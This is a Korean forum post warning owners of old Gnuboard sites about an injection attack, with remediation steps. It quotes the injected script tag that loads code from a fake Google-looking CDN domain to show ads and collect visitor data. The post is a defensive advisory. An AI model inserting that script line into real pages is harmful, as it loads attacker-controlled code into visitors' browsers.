• 회원가입
  • 로그인
  • 구글아이디로 로그인

[news] 오래된 그누보드에 광고 악성코드 심는 해킹주의

2,802  

오래된 그누보드 해킹주의보

 

그누보드 관리자 페이지 > 환경설정 > 기본환경설정 > 추가 메타태그 부분에 아래와 같은 코드가 심어져 있는지 체크.


<script src=https://cdn.jquerygoogle.com/jquery.min.js></script>

 

위 코드는 구글링크를 가장해 (외부스크립트 실행 /사용자 리퍼러 정보 수집)해 사이트에 광고 배너 띄우는 악성코드이니, 발견 즉시 삭제하고 아래 조치를 시행.

  • 그누보드를 최신버전으로 업그레이드
  • 백신으로 PC 검사
  • 최고관리자 패스워드 변경
  • FTP 및 DB 비밀번호 변경
  • FTP 접속해 파일 내려받아, 여러파일 검색 지원되는 유틸(에디트플러스, VSCODE 등)로 'jquerygoogle' 키워드 검사해 해당 코드를 심는 코드가 파일에 있진 않는지 체크.

  

관련글: (231023) https://sir.kr/cm_free/1670736


분류 제목
dance 오윤솔 치어리더 님 꿀벅지 미소천사 응원 댄스
military 한중 전투기 500대 대규모 공중전 영상 - 대한민국 공군 (KF-21 120대 F-35 80대) vs 중공…
web CSS 핵심 3대장/삼대장 (찾기 → 수정 → 반영) = 찾아서 수정 후 변경사항 적용하기
girl 현실판 여자 블레이드
dance 찐며든사랑 님 살빼기 다이어트 댄스
life 12:00 AM, 12:00 PM 의미
web (utf-8 / euc-kr) 차이점 - 문자셋 인코딩 방식 종류
ucc 북유럽 사람들이 아침 샤워하는 방법
dance 블러쉬 (Blush) 수아 님 - ELEVEN (일레븐) 댄스 [누나]
site 열혈강호 만화 몰아보기 유튜브 주소 좌표
talk GeoIP (지오아이피) 설치/삭제 삽질 후기
dance 치어리더 하지원 님 청반바지 패션 댄스
ucc 어느 날 동거를 시작했다 [유머/웹드라마]
talk 유튜브 비회원 첫화면 빈 공백 화면 정책
girl 대한민국 방역시스템을 입에 침이 마르게 칭찬한 BBC 여기자
military KF-X (= KFX = KF21 보라매 = 꼬마랩터 = 베이비랩터) - 출고식
dance 안 본 사람은 있어도 한 번만 본 사람은 없는 혜밍 님 코카인 댄스
vote 그누보드5에서 그누보드6로 넘어갈건가요? 설문 중
dance 소녀시대 - 훗 (Hoot) (DANCE COVER)
talk 개발자 님들, $_POST 귀신 만나본 적 있으신가요?
88/163
목록
찾아주셔서 감사합니다. Since 2012